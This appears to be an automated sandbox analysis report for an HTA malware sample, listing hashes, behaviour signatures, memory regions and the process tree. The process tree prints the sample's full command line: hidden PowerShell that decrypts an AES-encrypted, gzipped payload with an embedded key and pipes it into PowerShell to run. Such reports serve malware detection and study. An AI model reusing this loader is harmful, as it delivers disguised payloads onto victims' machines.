Resubmissions

21-01-2025 13:39

250121-qx27kswrck 10

21-01-2025 11:57

250121-n4kvrsskfv 10

21-01-2025 11:43

250121-nvpglaslfq 10

21-01-2025 11:26

250121-njtbea1qcp 10

Analysis

  • max time kernel
    113s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-01-2025 11:26

General

  • Target

    163.5.169.28/atoletter.hta

  • Size

    1.1MB

  • MD5

    47b67f1ef2ff1967fd6eee7f2eee2a79

  • SHA1

    e53cecf356df43405a19daf75ff5dcfd8b44f2ce

  • SHA256

    6c4beabd874f9b38209eb0cc585fc19407edc997ffb0bf0897c34bf4552f5194

  • SHA512

    d9586f412e0a9cecc5909cde9391def8c338ca086ba506366076816f6a4ce8309176e884a133bc11bec731bf1d9bf3b027e42ef6a49b545b000ffee60c6d42b9

  • SSDEEP

    1536:jxr5/6p/OpbQEcQIKdquZcod/zA4l2ZFmr/l1vcmafSIm+lIWFeQnoxLPCQwkcUC:jxV6JsMEcQIQZcod/c4K

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\163.5.169.28\atoletter.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2804
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $ouWgc = 'AAAAAAAAAAAAAAAAAAAAAJJ5zJYQm1Zc3enanMEM+VL8ZXuICb6VwD675Ng9elcpqLdG6ICh9Z7Z+T51gQRQ54EMOhzaaSKbTBu4JpiwL439fdXQDT70+pvcz4RAG9WpVYj59gf8JaM5/R8GHz+RAh72y7CFTElnWpJnPOWSmBQLOZzt0/lBGIkvo8CCtfb+eoNNtY2qVZkiAiAE6K+1AcPNbpKkdt2t5p905qBeTBpO6XAM14DJwkfG7/JjNjMsMQzmCMn900E9A/D38WhuXhXNdolwgKNr82S1P6WR1jGJ1gK19IH0Yo3o6Ztbp9t1W/MpsUmKvbfRGfR+ujtzM+BljKf4x7/C/vh5ROlaoxrfVeR8YjlVRWrrqqr2fGu8nJDe0R47zcHiTPa3KDIRm6DxbDsdWwgFmSg22QwwLcekZa7ZsJmI7LY/ARBjtZI/uinhgNJH4bHID52dCZCC4HxLBKiAyMoMVl2FFGmLmSjzZDw2lfAMj8Osj0hEeHMIP2hy1bX0/15KOCW1DFmWuGICLq0Nq4Zmv/QuJQ7JJzHGeayZXoawKVf34y++mDaahJecdnyL9nEeoj6HdBD+pbzL3yfP+KDYqFFrdqq/KdDyKTTNKpPflyInMJDn8TKDxPN7ZiDFKwB4g4qIgpGv4Age35rADhVpEO20ONR7t/shCgdp6aRd/69Fs6d6oNFyqD16GjcDt5AlFS8MEbpB/gwoQVV/TXaFs7IkfK389w1VVdMbud4LbHn2nm1Ie7ocZ2DJX4q4RmJ/tbS8OK0FttxyOhIhAiHBAWZJvHlRbRfRUtPOa0jUukf9ZO1r91Q0rU/bS4F6tyTahbT2YwftbqECzalSKVlMJ4p+3OaDWYWaGKodeuIhrdOyygIGnBKJQZHupLP00vzuBei0GseoaAi9dnz5Oca+4yosxHX12VS1HYHcMU5QKbFLcavV8R3NlHLe8M0rFUdnuvw+Tln4dQUk+lyNDVIIgikZGMcaDmRGCoDwy4sjJg7O4Lcqxbp0JOKIs7nB7vGDZQvqJlASEQ==';$KpoWkt = 'cGlRTW1jb0JrYXNBRWliZEFhV29NTlFZdUZoZmRYTHM=';$gzZYTwF = New-Object 'System.Security.Cryptography.AesManaged';$gzZYTwF.Mode = [System.Security.Cryptography.CipherMode]::ECB;$gzZYTwF.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$gzZYTwF.BlockSize = 128;$gzZYTwF.KeySize = 256;$gzZYTwF.Key = [System.Convert]::FromBase64String($KpoWkt);$aNMav = [System.Convert]::FromBase64String($ouWgc);$NtOIkJQM = $aNMav[0..15];$gzZYTwF.IV = $NtOIkJQM;$iZrffCtxZ = $gzZYTwF.CreateDecryptor();$gUtySeDSJ = $iZrffCtxZ.TransformFinalBlock($aNMav, 16, $aNMav.Length - 16);$gzZYTwF.Dispose();$ggfKN = New-Object System.IO.MemoryStream( , $gUtySeDSJ );$PQcPw = New-Object System.IO.MemoryStream;$kxDrFXdIy = New-Object System.IO.Compression.GzipStream $ggfKN, ([IO.Compression.CompressionMode]::Decompress);$kxDrFXdIy.CopyTo( $PQcPw );$kxDrFXdIy.Close();$ggfKN.Close();[byte[]] $rFrmBzrz = $PQcPw.ToArray();$CHvPLqa = [System.Text.Encoding]::UTF8.GetString($rFrmBzrz);$CHvPLqa | powershell - }
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2376
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c powershell.exe $ouWgc = 'AAAAAAAAAAAAAAAAAAAAAJJ5zJYQm1Zc3enanMEM+VL8ZXuICb6VwD675Ng9elcpqLdG6ICh9Z7Z+T51gQRQ54EMOhzaaSKbTBu4JpiwL439fdXQDT70+pvcz4RAG9WpVYj59gf8JaM5/R8GHz+RAh72y7CFTElnWpJnPOWSmBQLOZzt0/lBGIkvo8CCtfb+eoNNtY2qVZkiAiAE6K+1AcPNbpKkdt2t5p905qBeTBpO6XAM14DJwkfG7/JjNjMsMQzmCMn900E9A/D38WhuXhXNdolwgKNr82S1P6WR1jGJ1gK19IH0Yo3o6Ztbp9t1W/MpsUmKvbfRGfR+ujtzM+BljKf4x7/C/vh5ROlaoxrfVeR8YjlVRWrrqqr2fGu8nJDe0R47zcHiTPa3KDIRm6DxbDsdWwgFmSg22QwwLcekZa7ZsJmI7LY/ARBjtZI/uinhgNJH4bHID52dCZCC4HxLBKiAyMoMVl2FFGmLmSjzZDw2lfAMj8Osj0hEeHMIP2hy1bX0/15KOCW1DFmWuGICLq0Nq4Zmv/QuJQ7JJzHGeayZXoawKVf34y++mDaahJecdnyL9nEeoj6HdBD+pbzL3yfP+KDYqFFrdqq/KdDyKTTNKpPflyInMJDn8TKDxPN7ZiDFKwB4g4qIgpGv4Age35rADhVpEO20ONR7t/shCgdp6aRd/69Fs6d6oNFyqD16GjcDt5AlFS8MEbpB/gwoQVV/TXaFs7IkfK389w1VVdMbud4LbHn2nm1Ie7ocZ2DJX4q4RmJ/tbS8OK0FttxyOhIhAiHBAWZJvHlRbRfRUtPOa0jUukf9ZO1r91Q0rU/bS4F6tyTahbT2YwftbqECzalSKVlMJ4p+3OaDWYWaGKodeuIhrdOyygIGnBKJQZHupLP00vzuBei0GseoaAi9dnz5Oca+4yosxHX12VS1HYHcMU5QKbFLcavV8R3NlHLe8M0rFUdnuvw+Tln4dQUk+lyNDVIIgikZGMcaDmRGCoDwy4sjJg7O4Lcqxbp0JOKIs7nB7vGDZQvqJlASEQ==';$KpoWkt = 'cGlRTW1jb0JrYXNBRWliZEFhV29NTlFZdUZoZmRYTHM=';$gzZYTwF = New-Object 'System.Security.Cryptography.AesManaged';$gzZYTwF.Mode = [System.Security.Cryptography.CipherMode]::ECB;$gzZYTwF.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$gzZYTwF.BlockSize = 128;$gzZYTwF.KeySize = 256;$gzZYTwF.Key = [System.Convert]::FromBase64String($KpoWkt);$aNMav = [System.Convert]::FromBase64String($ouWgc);$NtOIkJQM = $aNMav[0..15];$gzZYTwF.IV = $NtOIkJQM;$iZrffCtxZ = $gzZYTwF.CreateDecryptor();$gUtySeDSJ = $iZrffCtxZ.TransformFinalBlock($aNMav, 16, $aNMav.Length - 16);$gzZYTwF.Dispose();$ggfKN = New-Object System.IO.MemoryStream( , $gUtySeDSJ );$PQcPw = New-Object System.IO.MemoryStream;$kxDrFXdIy = New-Object System.IO.Compression.GzipStream $ggfKN, ([IO.Compression.CompressionMode]::Decompress);$kxDrFXdIy.CopyTo( $PQcPw );$kxDrFXdIy.Close();$ggfKN.Close();[byte[]] $rFrmBzrz = $PQcPw.ToArray();$CHvPLqa = [System.Text.Encoding]::UTF8.GetString($rFrmBzrz);$CHvPLqa | powershell -
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:5096
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe $ouWgc = 'AAAAAAAAAAAAAAAAAAAAAJJ5zJYQm1Zc3enanMEM+VL8ZXuICb6VwD675Ng9elcpqLdG6ICh9Z7Z+T51gQRQ54EMOhzaaSKbTBu4JpiwL439fdXQDT70+pvcz4RAG9WpVYj59gf8JaM5/R8GHz+RAh72y7CFTElnWpJnPOWSmBQLOZzt0/lBGIkvo8CCtfb+eoNNtY2qVZkiAiAE6K+1AcPNbpKkdt2t5p905qBeTBpO6XAM14DJwkfG7/JjNjMsMQzmCMn900E9A/D38WhuXhXNdolwgKNr82S1P6WR1jGJ1gK19IH0Yo3o6Ztbp9t1W/MpsUmKvbfRGfR+ujtzM+BljKf4x7/C/vh5ROlaoxrfVeR8YjlVRWrrqqr2fGu8nJDe0R47zcHiTPa3KDIRm6DxbDsdWwgFmSg22QwwLcekZa7ZsJmI7LY/ARBjtZI/uinhgNJH4bHID52dCZCC4HxLBKiAyMoMVl2FFGmLmSjzZDw2lfAMj8Osj0hEeHMIP2hy1bX0/15KOCW1DFmWuGICLq0Nq4Zmv/QuJQ7JJzHGeayZXoawKVf34y++mDaahJecdnyL9nEeoj6HdBD+pbzL3yfP+KDYqFFrdqq/KdDyKTTNKpPflyInMJDn8TKDxPN7ZiDFKwB4g4qIgpGv4Age35rADhVpEO20ONR7t/shCgdp6aRd/69Fs6d6oNFyqD16GjcDt5AlFS8MEbpB/gwoQVV/TXaFs7IkfK389w1VVdMbud4LbHn2nm1Ie7ocZ2DJX4q4RmJ/tbS8OK0FttxyOhIhAiHBAWZJvHlRbRfRUtPOa0jUukf9ZO1r91Q0rU/bS4F6tyTahbT2YwftbqECzalSKVlMJ4p+3OaDWYWaGKodeuIhrdOyygIGnBKJQZHupLP00vzuBei0GseoaAi9dnz5Oca+4yosxHX12VS1HYHcMU5QKbFLcavV8R3NlHLe8M0rFUdnuvw+Tln4dQUk+lyNDVIIgikZGMcaDmRGCoDwy4sjJg7O4Lcqxbp0JOKIs7nB7vGDZQvqJlASEQ==';$KpoWkt = 'cGlRTW1jb0JrYXNBRWliZEFhV29NTlFZdUZoZmRYTHM=';$gzZYTwF = New-Object 'System.Security.Cryptography.AesManaged';$gzZYTwF.Mode = [System.Security.Cryptography.CipherMode]::ECB;$gzZYTwF.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$gzZYTwF.BlockSize = 128;$gzZYTwF.KeySize = 256;$gzZYTwF.Key = [System.Convert]::FromBase64String($KpoWkt);$aNMav = [System.Convert]::FromBase64String($ouWgc);$NtOIkJQM = $aNMav[0..15];$gzZYTwF.IV = $NtOIkJQM;$iZrffCtxZ = $gzZYTwF.CreateDecryptor();$gUtySeDSJ = $iZrffCtxZ.TransformFinalBlock($aNMav, 16, $aNMav.Length - 16);$gzZYTwF.Dispose();$ggfKN = New-Object System.IO.MemoryStream( , $gUtySeDSJ );$PQcPw = New-Object System.IO.MemoryStream;$kxDrFXdIy = New-Object System.IO.Compression.GzipStream $ggfKN, ([IO.Compression.CompressionMode]::Decompress);$kxDrFXdIy.CopyTo( $PQcPw );$kxDrFXdIy.Close();$ggfKN.Close();[byte[]] $rFrmBzrz = $PQcPw.ToArray();$CHvPLqa = [System.Text.Encoding]::UTF8.GetString($rFrmBzrz);$CHvPLqa
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:744
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -
          4⤵
          • Blocklisted process makes network request
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4344

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

    Filesize

    1KB

    MD5

    def65711d78669d7f8e69313be4acf2e

    SHA1

    6522ebf1de09eeb981e270bd95114bc69a49cda6

    SHA256

    aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c

    SHA512

    05b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    15KB

    MD5

    a80e3550b4fb59fce2ab166cea289c20

    SHA1

    6bb92f9f467cb313fb06f225b651e4f6072f90d8

    SHA256

    c74a9a93449eaf14a35692295ca41c59b877a364b531dae235ae849b045b6840

    SHA512

    bcc9488d1401df1cc515f4d7bcf149bc030c192cd32114e9829b559bcf89eb3a5e10e121513c9a61a73f2332ef38cbd1c4079515608e7e2fba71ae510a4b8736

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_udivqpwv.nwi.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/744-48-0x00000000073F0000-0x0000000007A6A000-memory.dmp

    Filesize

    6.5MB

  • memory/744-28-0x0000000005460000-0x00000000057B4000-memory.dmp

    Filesize

    3.3MB

  • memory/2376-20-0x0000000006D30000-0x0000000006DC6000-memory.dmp

    Filesize

    600KB

  • memory/2376-2-0x0000000071C90000-0x0000000072440000-memory.dmp

    Filesize

    7.7MB

  • memory/2376-5-0x0000000004CC0000-0x0000000004CE2000-memory.dmp

    Filesize

    136KB

  • memory/2376-7-0x0000000005500000-0x0000000005566000-memory.dmp

    Filesize

    408KB

  • memory/2376-17-0x0000000005570000-0x00000000058C4000-memory.dmp

    Filesize

    3.3MB

  • memory/2376-18-0x0000000005B80000-0x0000000005B9E000-memory.dmp

    Filesize

    120KB

  • memory/2376-19-0x0000000005C10000-0x0000000005C5C000-memory.dmp

    Filesize

    304KB

  • memory/2376-22-0x00000000060E0000-0x0000000006102000-memory.dmp

    Filesize

    136KB

  • memory/2376-21-0x0000000006090000-0x00000000060AA000-memory.dmp

    Filesize

    104KB

  • memory/2376-0-0x0000000071C9E000-0x0000000071C9F000-memory.dmp

    Filesize

    4KB

  • memory/2376-23-0x0000000007380000-0x0000000007924000-memory.dmp

    Filesize

    5.6MB

  • memory/2376-4-0x0000000071C90000-0x0000000072440000-memory.dmp

    Filesize

    7.7MB

  • memory/2376-27-0x0000000071C90000-0x0000000072440000-memory.dmp

    Filesize

    7.7MB

  • memory/2376-6-0x0000000005420000-0x0000000005486000-memory.dmp

    Filesize

    408KB

  • memory/2376-3-0x0000000004DF0000-0x0000000005418000-memory.dmp

    Filesize

    6.2MB

  • memory/2376-1-0x0000000002270000-0x00000000022A6000-memory.dmp

    Filesize

    216KB

  • memory/4344-49-0x0000000006DC0000-0x0000000006E04000-memory.dmp

    Filesize

    272KB

  • memory/4344-51-0x0000000007170000-0x00000000071E6000-memory.dmp

    Filesize

    472KB

  • memory/4344-53-0x0000000007700000-0x0000000007732000-memory.dmp

    Filesize

    200KB

  • memory/4344-54-0x000000006E550000-0x000000006E59C000-memory.dmp

    Filesize

    304KB

  • memory/4344-55-0x000000006E8C0000-0x000000006EC14000-memory.dmp

    Filesize

    3.3MB

  • memory/4344-65-0x0000000007740000-0x000000000775E000-memory.dmp

    Filesize

    120KB

  • memory/4344-66-0x0000000007760000-0x0000000007803000-memory.dmp

    Filesize

    652KB

  • memory/4344-67-0x0000000007860000-0x000000000786A000-memory.dmp

    Filesize

    40KB

  • memory/4344-68-0x0000000007F20000-0x0000000007F31000-memory.dmp

    Filesize

    68KB